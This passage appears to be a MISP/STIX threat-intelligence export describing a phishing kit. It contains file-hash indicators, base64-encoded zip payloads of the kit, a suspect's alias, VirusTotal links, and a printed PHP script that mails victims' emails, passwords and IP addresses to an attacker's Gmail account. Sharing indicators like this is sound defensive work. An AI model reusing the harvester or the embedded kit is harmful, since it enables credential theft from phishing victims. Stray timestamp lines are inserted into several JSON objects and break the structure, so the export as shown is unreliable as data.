'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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-16T13:48:15Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cdd5ff1-ed58-46d3-bed7-4bae950d210f",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:52:15.000Z",
"modified": "2019-05-16T13:52:15.000Z",
"description": "Phishkit",
"pattern": "[file:hashes.MD5 = 'b7245bf657e792328aaacbc6f75d1555' AND file:hashes.SHA1 = 'bc32ff3213011db8278bfcd21b1dc432ded499d3' AND file:hashes.SHA256 = '9c4f9755fc183f6ad4ad4d600a0a3ed9230900152245f924b9106202ce543c58' AND file:name = 'New-Updated-docs.zip' AND file:name_enc = 'Adobe-Standard-Encoding' AND file:size = '3525231' AND (file:content_ref.payload_bin = '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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-16T13:52:15Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--5cdd6190-8c08-46ef-b523-4da2950d210f",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:43:45.000Z",
"modified": "2019-05-16T13:43:45.000Z",
"labels": [
"misp:name=\"person\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "role",
"value": "Suspect",
"category": "Other",
"uuid": "5cdd6190-8d2c-4bc1-a932-4fd4950d210f"
},
{
"type": "text",
"object_relation": "alias",
"value": "JATBOSS",
"category": "Other",
"uuid": "5cdd6190-d518-4fb8-8401-450c950d210f"
},
{
"type": "gender",
"object_relation": "gender",
"value": "Prefer not to say",
"category": "Person",
"uuid": "5cdd6190-bea0-4a00-b93f-4488950d210f"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "person"
},
{
"type": "malware",
"spec_version": "2.1",
"id": "malware--5cdd62fc-c898-42fb-ad4d-4aac950d210f",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:17:48.000Z",
"modified": "2019-05-16T13:17:48.000Z",
"name": "sendmail.php",
"is_family": false,
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "misc"
}
],
"implementation_languages": [
"PHP"
],
"labels": [
"misp:name=\"script\"",
"misp:meta-category=\"misc\"",
"misp:to_ids=\"True\""
],
"x_misp_script": "<?php\r\nif(isset($_SERVER['HTTP_X_REAL_IP'])){\r\n$ip = $_SERVER['HTTP_X_REAL_IP'];\r\n}else{\r\n$ip=$_SERVER['REMOTE_ADDR'];\r\n}\r\n$message .= \"|----------| E M A I L |--------------|\\n\";\r\n$message .= \"Online: \".$_POST['email'].\"\\n\";\r\n$message .= \"pass: \".$_POST['pwd'].\"\\n\";\r\n$message .= \"|--------------- I N F O | I P -------------------|\\n\";\r\n$message .= \"|Client IP: \".$ip.\"\\n\";\r\n$message .= \"|--- http://www.geoiptool.com/?IP=$ip ----\\n\";\r\n$message .= \"User Agent : \".$useragent.\"\\n\";\r\n$message .= \"|----------- HACKED BY JATBOSS --------------|\\n\";\r\n$send = \"jatboss6@gmail.com\";\r\n$subject = \"$country | $ip\";\r\n{\r\nmail(\"$send\", \"$subject\", $message); \r\n}\r\n\r\n\r\n?>",
"x_misp_state": "Malicious"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--d9bdc42c-191f-49a2-8cbe-2604f5462df6",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:29:11.000Z",
"modified": "2019-05-16T13:29:11.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2019-05-16T08:54:33",
"category": "Other",
"uuid": "f1c90675-0c32-40f1-af8f-f90a06993120"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/f2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a/analysis/1557996873/",
"category": "Payload delivery",
"uuid": "f8eb37d5-1ef7-4e7c-b97c-7fcab9d7e00e"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "1/56",
"category": "Payload delivery",
"uuid": "fb7fe45e-a16c-44c4-9a4b-7b6b0018fd43"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--dcd9ca51-3194-44ee-86a2-5f0cf9b923f8",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:29:11.000Z",
"modified": "2019-05-16T13:29:11.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2019-05-13T02:37:30",
"category": "Other",
"uuid": "ac5c453a-e980-47a2-9a84-5d37cf392471"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936/analysis/1557715050/",
"category": "Payload delivery",
"uuid": "2b1914f7-d429-496f-b76b-dd9ea4ae34f2"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "0/58",
"category": "Payload delivery",
"uuid": "c092edd1-d209-4fc1-8b59-cc68ea535499"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--76f9b382-c58e-46f8-b174-42275f764d3e",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:29:11.000Z",
"modified": "2019-05-16T13:29:11.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2019-05-13T02:37:43",
"category": "Other",
"uuid": "15b0df6f-7808-4a07-a743-33883c247a54"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02/analysis/1557715063/",
"category": "Payload delivery",
"uuid": "15db416c-93ca-4af3-bc7e-aa8af7ad332e"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "2/59",
"category": "Payload delivery",
"uuid": "0c2fc5a0-15f4-432a-90c6-c3a49b54266e"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--c22ccebe-e72f-4b92-9c63-a196b4959c43",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:29:12.000Z",
"modified": "2019-05-16T13:29:12.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2019-05-15T17:45:13",
"category": "Other",
"uuid": "829ba8b8-a820-487f-9199-96b13a032e7b"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132/analysis/1557942313/",
"category": "Payload delivery",
"uuid": "77e038db-79c1-487f-8193-f857970cfd08"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "1/54",
"category": "Payload delivery",
"uuid": "17e94734-ed26-449a-b1fe-768b881c6f83"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--c3b36005-d35f-4540-bf78-cd09e2ac5e3d",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:29:12.000Z",
"modified": "2019-05-16T13:29:12.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2019-05-16T09:42:04",
"category": "Other",
"uuid": "823fdaca-bb79-49fd-b865-e3e9d8dd86e3"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/9c4f9755fc183f6ad4ad4d600a0a3ed9230900152245f924b9106202ce543c58/analysis/1557999724/",
"category": "Payload delivery",
"uuid": "3f1e2085-c793-4bb9-8022-5d037641c73e"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "10/61",
"category": "Payload delivery",
"uuid": "2c1f9f4d-f9bb-442e-84f8-0f06c1b28d5f"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--f5647ba0-86e7-40fa-92a2-7d0fe024a7c2",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:29:12.000Z",
"modified": "2019-05-16T13:29:12.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2019-05-15T20:41:35",
"category": "Other",
"uuid": "e2e51a40-0e8a-41df-a238-3176befa0d6d"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/c052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2/analysis/1557952895/",
"category": "Payload delivery",
"uuid": "2e637413-a76f-4b89-a5f1-1fb99c942c20"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "1/60",
"category": "Payload delivery",
"uuid": "a84ca298-e8e4-4048-becf-05c209cfaa19"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--9156df9c-4067-422e-bd38-8c3908e8ea5f",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:29:12.000Z",
"modified": "2019-05-16T13:29:12.000Z",
"labels": [
"misp:name=\"virustotal-report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "datetime",
"object_relation": "last-submission",
"value": "2019-05-13T02:37:29",
"category": "Other",
"uuid": "f1406b9a-3d0d-4419-96dc-6400f3a9bbb1"
},
{
"type": "link",
"object_relation": "permalink",
"value": "https://www.virustotal.com/file/ddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73/analysis/1557715049/",
"category": "Payload delivery",
"uuid": "69ee832e-72d0-4b4b-a11c-f57e0452a076"
},
{
"type": "text",
"object_relation": "detection-ratio",
"value": "0/58",
"category": "Payload delivery",
"uuid": "7d4b7e4e-98b2-4840-92ea-7f22911f5603"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "virustotal-report"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--a1cc288d-984d-454c-bb8a-4f39eaabc9d9",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:22.000Z",
"modified": "2021-05-24T09:55:22.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--97bd5034-12a0-4c06-a779-de38deac6059",
"target_ref": "x-misp-object--76f9b382-c58e-46f8-b174-42275f764d3e"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--9e24ff82-461d-47c8-9a8d-632538aa9dc7",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:22.000Z",
"modified": "2021-05-24T09:55:22.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--3a4f2299-8136-45ec-8927-223b672e4b88",
"target_ref": "x-misp-object--dcd9ca51-3194-44ee-86a2-5f0cf9b923f8"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--75543602-135e-47b5-adeb-33617b83b44e",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:22.000Z",
"modified": "2021-05-24T09:55:22.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--9608228e-4373-44ac-9fdd-bd37d5b02275",
"target_ref": "x-misp-object--9156df9c-4067-422e-bd38-8c3908e8ea5f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--961af626-d91c-4abf-a0b5-96a19a591dc6",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:22.000Z",
"modified": "2021-05-24T09:55:22.000Z",
"relationship_type": "contains",
"source_ref": "indicator--9608228e-4373-44ac-9fdd-bd37d5b02275",
"target_ref": "x-misp-attribute--5cdd63dc-0b30-404e-a1c4-4479950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--93a1b5cb-b3c4-41fe-872b-4baa08510b8f",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:22.000Z",
"modified": "2021-05-24T09:55:22.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--9b01cb2b-b6f7-433f-a91d-7b572e8324bd",
"target_ref": "x-misp-object--c22ccebe-e72f-4b92-9c63-a196b4959c43"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--456cb2c1-ca0b-4af8-bfd3-930e0613f289",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:22.000Z",
"modified": "2021-05-24T09:55:22.000Z",
"relationship_type": "contains",
"source_ref": "indicator--9b01cb2b-b6f7-433f-a91d-7b572e8324bd",
"target_ref": "x-misp-attribute--5cdd683b-6530-4b0d-a8de-40c1950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--1a96e906-2823-4077-9c49-0f488ce57dc7",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:22.000Z",
"modified": "2021-05-24T09:55:22.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--06a84b03-0560-46ae-8570-1e7072a0b400",
"target_ref": "x-misp-object--f5647ba0-86e7-40fa-92a2-7d0fe024a7c2"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--6310681b-0514-46b0-b9c0-60b29c6d28e2",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:22.000Z",
"modified": "2021-05-24T09:55:22.000Z",
"relationship_type": "contains",
"source_ref": "indicator--06a84b03-0560-46ae-8570-1e7072a0b400",
"target_ref": "x-misp-attribute--5cdd63dc-0e48-4b97-bb9e-43ff950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--fb869c02-938e-4078-993e-6950c0959253",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:22.000Z",
"modified": "2021-05-24T09:55:22.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--453258ef-0925-4471-9dcc-a06ab8038664",
"target_ref": "x-misp-object--d9bdc42c-191f-49a2-8cbe-2604f5462df6"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--9a086825-5904-414d-b479-8205d53b8500",
2023-04-21 14:44:17 +00:00
"created": "2021-05-24T09:55:22.000Z",
"modified": "2021-05-24T09:55:22.000Z",
"relationship_type": "contains",
"source_ref": "indicator--453258ef-0925-4471-9dcc-a06ab8038664",
"target_ref": "x-misp-attribute--5cdd683b-6530-4b0d-a8de-40c1950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--1133d1e2-9a31-40e6-a67e-73d1afa18ba1",
